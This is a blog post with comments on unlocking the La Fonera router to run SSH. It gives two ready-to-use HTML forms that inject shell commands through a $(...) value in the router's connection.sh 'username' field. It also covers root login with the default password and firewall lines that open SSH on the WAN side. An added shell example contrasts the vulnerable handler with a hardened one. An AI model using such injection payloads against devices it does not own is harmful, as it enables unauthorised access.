Hacking Fonera
Yesterday I received my Fonera. I spent the last two days trying to run an SSH daemon on it. After a lot of searching and surfing, I finally found, with the help of these two sites, a way to force the Fonera to run SSH. I will briefly sum up the hack; it worked successfully with the 0.7.1 r1 FON firmware (if you have the 0.7.1.2 firmware, you have to reset it):
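First you have to write two HTML pages which will inject code into your FON router: each one posts a form to the router's connection.sh with a shell command substitution, $(...), as the username value. Save the following code as step1.html: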
<html>
<head>
</head>
<body>
<center>
<form method="post" action="http://192.168.10.1/cgi-bin/webif/connection.sh" enctype="multipart/form-data">
<input name="username" value="$(/usr/sbin/iptables -I INPUT 1 -p tcp --dport 22 -j ACCEPT)" size="68" >
<input type="submit" name="submit" value="Submit" onClick="{this.form.wifimode.value='";' + this.form.wifimode.value +';"'}" />
</form>
</body>
</html>
Save the next HTML code as step2.html:
<html>
<head>
</head>
<body>
<center>
<form method="post" action="http://192.168.10.1/cgi-bin/webif/connection.sh" enctype="multipart/form-data">
<input name="username" value="$(/etc/init.d/dropbear)" size="68" >
<input type="submit" name="submit" value="Submit" onClick="{this.form.wifimode.value='";' + this.form.wifimode.value +';"'}" />
</form>
</body>
</html>
Now connect to your MyPlace network, open both pages and just click the "Submit" button (first on the step1.html page, then on the step2.html page). Open your favorite shell and connect to your router via SSH with username root and password admin.
ssh root@192.168.10.1
To make SSH access permanent, you have to rename the dropbear init script to S50dropbear:
mv /etc/init.d/dropbear /etc/init.d/S50dropbear
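In /etc/firewall.user you have to uncomment these lines:
# iptables -t nat -A prerouting_rule -i $WAN -p tcp --dport 22 -j ACCEPT
# iptables -A input_rule -i $WAN -p tcp --dport 22 -j ACCEPT
These rules accept SSH connections arriving on the WAN interface, and root still has the password admin at this point, so change it before enabling them.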
Now you should prevent FON from executing received code by editing /bin/thinclient. You have to comment out the last line and add another line, so that the last two lines look like this:
#. /tmp/.thinclient.sh
cp /tmp/.thinclient.sh /tmp/thinclient-$(date '+%Y%m%d-%H%M')
The received script is then no longer sourced; a timestamped copy is kept in /tmp for inspection instead.
Now you have an SSH daemon on your Fonera.
btw: thanks a lot cologne.idle and "Пожалуйста не пойте под фанеру!"
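Why a $(...) value in a form field ends up running as a command, and what input handling stops it, shown as an added example that is not part of the original post and is not FON's code. It assumes a hypothetical handler that saves the field into a shell-style config file which is sourced later (the real connection.sh is not shown on this page); the function names, file names and the harmless touch payload are constructed for the illustration.

```shell
#!/bin/sh
# Added illustration, not FON's code: a HYPOTHETICAL settings handler that saves
# a form field into a shell-style config file which is sourced later.
WORK=$(mktemp -d)   # scratch directory for the constructed config files

# Vulnerable pattern: the raw value lands inside double quotes, so any $(...)
# in it is expanded when the file is sourced.
save_vulnerable() {
    printf 'username="%s"\n' "$1" > "$WORK/conf_vuln"
}

# Hardened pattern: allow-list the characters, then store single-quoted so the
# shell treats the value as data. Returns 1 and writes nothing on rejection.
save_hardened() {
    case "$1" in
        ''|*[!A-Za-z0-9@._-]*) return 1 ;;
    esac
    printf "username='%s'\n" "$1" > "$WORK/conf_safe"
}

# Source a saved config in a subshell and print the resulting username.
load_conf() {
    ( . "$1"; printf '%s' "$username" )
}

# Returns 0 if the embedded command ran for the given mode (vulnerable|hardened).
payload_executes() {
    marker="$WORK/marker.$1"
    payload="\$(touch '$marker')"   # constructed, harmless stand-in for the page's $(...)
    rm -f "$marker"
    if [ "$1" = vulnerable ]; then
        save_vulnerable "$payload"
        load_conf "$WORK/conf_vuln" > /dev/null
    elif save_hardened "$payload"; then
        load_conf "$WORK/conf_safe" > /dev/null
    fi
    [ -e "$marker" ]
}

for mode in vulnerable hardened; do
    if payload_executes "$mode"; then
        echo "$mode: command in username was executed"
    else
        echo "$mode: value rejected, nothing executed"
    fi
done
```

The marker file appears only in the vulnerable case; the hardened handler rejects the value before anything is written or sourced.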
Trackbacks
Alessandro "jekil" Tanasi blog: Hacking La Fonera
Today I received my Fonera. Fonera has been designed not to be hacked. Really? Hacking the La Fonera, OpenWrtDocs Hardware, Dd-wrt about La Fonera, La Fonera Flashing, Hacking Fonera, Openwrt K on la Fonera without serial console, La Fonera dissection and hack, Inside th
Coding my Life: Fonera Downgrade
If you want to downgrade your fonera from 0.7.1.2 firmware to the 0.7.1, look here.
Comments
Aschenbash0r wrote:
=
Please do not sing under plywood!
I copy&pasted it into an online translator
kalkin wrote:
ARARAT wrote:
Chance wrote:
kalkin wrote:
Chance wrote:
Thanks
matyas wrote:
I have just come across your website. I have received a Fonera too, and I have some (maybe stupid) questions: why is it good that I can have SSH access to my Fonera? What is the advantage of that? And why is it good for me that I prevent FON from executing code on my box?
thank you very much
Matyas (from Hungary)
Riku wrote:
You can access that Linux and make some changes. It's also more secure than just telnet.
> what is the advantage of that?
You can make changes.
> and why is it good for me that i prevent FON from executing code on my box?
It's a security thing. The FON box will execute any code it receives from FON without these hacks.
Jay wrote:
Can anybody help me?
Fabs wrote:
kalkin wrote:
geek wrote:
instead of this:
#. /tmp/.thinclient.sh
cp /tmp/.thinclient.sh /tmp/thinclient-$(date '+%Y%m%d-%H%M')
use this:
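# only act if a non-empty script was received
if [ -s /tmp/.thinclient.sh ] ; then
    # after the loop, $f holds the last saved copy in glob order (newest timestamp)
    for f in /tmp/thin* ; do
        :
    done
    if [ -f "$f" ]; then
        # save a new copy only if its checksum differs from the last one
        if [ "$(md5sum /tmp/.thinclient.sh | cut -d ' ' -f 1)" != "$(md5sum "$f" | cut -d ' ' -f 1)" ] ; then
            cp /tmp/.thinclient.sh /tmp/thinclient-$(date '+%Y%m%d-%H%M')
        fi
    else
        cp /tmp/.thinclient.sh /tmp/thinclient-$(date '+%Y%m%d-%H%M')
    fi
fi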
This way a new thinclient "log" will only be created if it differs from the last one and if it's not empty. Code isn't probably very beautiful, but it seems to work
kalkin wrote:
fon-fan wrote:
Do you have some more information, links to threads on the forum?
Am I right that Linux 2.6 is the only thing to be ported?
kalkin wrote:
There is a forum thread about ddwrt on fonera.
Fabs wrote:
Late wrote:
futejia wrote:
I am waiting for dd-wrt. Yeah!
Btw: the serial console sucks. I tried for more than two hours to use it.
Barol wrote:
Jimmi wrote:
You have to support this thing, not hack it!
futejia wrote:
2) I think Google and eBay have enough money. They don't need our support.
Stefan Tomanek wrote:
http://stefans.datenbruch.de/lafonera/
and especially http://stefans.datenbruch.de/lafonera/whywedidit.shtml
It's not about sabotaging FON, it's about keeping in control of your network.
jarena wrote:
jarena wrote:
jarena wrote:
At last the problem was La Fonera was taking too long to get an IP via DHCP, and while this is not done the public network can't be seen. I don't know if this is just normal, but I think so, because I read before the flash memory of La Fonera was quite slow, extending startup time.
Maurizio wrote:
kalkin wrote:
I have the same problem if I'm changing from fixed IP to DHCP. The change takes really long.
My experience is that the best way in these cases is to restart the Fonera.
Maurizio wrote:
Normally, the DHCP server on my modem/router assigns IP addresses to other network devices in a few seconds. Besides that, I've tried to restart the Fonera, with no effect.
cable wrote:
You should change the web server address to 169.254.255.1 instead of 192.168.10.1. Both in the html page and the ssh session.
Rui Ponte wrote:
kalkin wrote:
You take something spiky (for example a pin) and press the reset button, below the Fonera, for 5 sec. It should be reset to the 0.7.1 firmware.
Torbar wrote:
Rui Ponte wrote:
Stefan Tomanek wrote:
There is a new hack (this time called "kolofonium"), however we are not releasing it until 0.7.1.2 has become widespread on new routers - otherwise, it would be wasted
Paul wrote:
Tiago wrote:
Stefan Tomanek wrote:
Michael Henn wrote:
Thanks for any help from anyone!
sp00nix wrote:
Google the vi command list, it's kinda confusing how to work
narmacil wrote:
@@@@@@@@@@@@@@@@@@@@@@
@ WARNING: REMOTE HOST IDENTIFICATION HAS CHANGED! @
@@@@@@@@@@@@@@@@@@@@@@
IT IS POSSIBLE THAT SOMEONE IS DOING SOMETHING NASTY!
Someone could be eavesdropping on you right now (man-in-the-middle attack)!
It is also possible that the RSA host key has just been changed.
The fingerprint for the RSA key sent by the remote host is
23:55:f0:ec:9e:61:24:e8:8e:a5:0d:79:f0:85:65:64.
Please contact your system administrator.
Add correct host key in /home/Administrator/.ssh/known_hosts to get rid of this
message.
Offending key in /home/Administrator/.ssh/known_hosts:1
RSA host key for 192.168.10.1 has changed and you have requested strict checking
.
Host key verification failed.
narmacil wrote:
Smiley wrote:
kalkin wrote:
Josh wrote:
kalkin wrote:
Antonio wrote:
Hope you enjoy ...and improve
Antonio
Wenle wrote:
$> mv /etc/init.d/dropbear /etc/init.d/S50dropbear
it responds -ash: $: not found
What does that mean? Should I continue to second command?
kalkin wrote:
mv /etc/init.d/dropbear /etc/init.d/S50dropbear
Takenover83 wrote:
I have my Fonera hooked up to a WRT54GS.
Also, what local webserver works OK with this guide? I tried a couple, but got errors when using wget.
For example.
Using "wget http://127.0.0.1/nameofthefile" just gives me a forbidden type of error.
But when I test the same link in a webbrowser, the webserver works just fine and allows me to download.
Paul wrote:
Paul wrote:
I was absolutely convinced that my router was 7.1.2 firmware, but after pulling my fon open (easy!) and looking, yup, 7.1.1. Use coldtobi's page to reset the right way, and you'll be able to play soon yourself!
john earthquake wrote:
kalkin wrote:
Popup2u wrote:
dltv wrote:
Most importantly, can you connect to the router via the Ethernet port with DDWRT? Or does it have to be wirelessly? Because I can't connect to 192.168.1.1
or whatever the right IP is, I still can't connect to the DDWRT interface via Ethernet cable, only wirelessly
Wrote a tutorial on hacking it at dltv.wordpress.com
grazzt wrote:
I don't have any wifi cards yet.
I see the 192.168.* is for the wifi side.
The manual states to set static ip for nic to 169.254.255.2. When I do this, I can check the status of the fon by going to http://169.254.255.1 (and showing 0.71 r1 as the firmware).
Any help would be appreciated.
Thanks
grazzt wrote:
And it worked!
ssd wrote:
yea wrote:
dna wrote:
anyone send me e-mail that attached it?
kalkin wrote:
jeff wrote:
Muhammad Waqas wrote:
dltv wrote:
Gives some networking advice.
grazzy wrote:
Then the FON listens to port 8080 on the wan side.
Hope this helps anyone.
Jürgen wrote:
Strafverteidiger München wrote:
http://dltv.wordpress.com/off-the-wall/a-guide-to-hacking-the-la-fonera-wireless-router/
But as well a helpful information.
Strafverteidiger Freiburg wrote:
eric wrote:
http://www.fonerahacks.com
kenjiru wrote:
Any idea what to do now?
Computmaxer wrote:
www.fonerahacks.com
nglrossi wrote:
I am about to install dd-wrt now.
Angelo
Johnny wrote: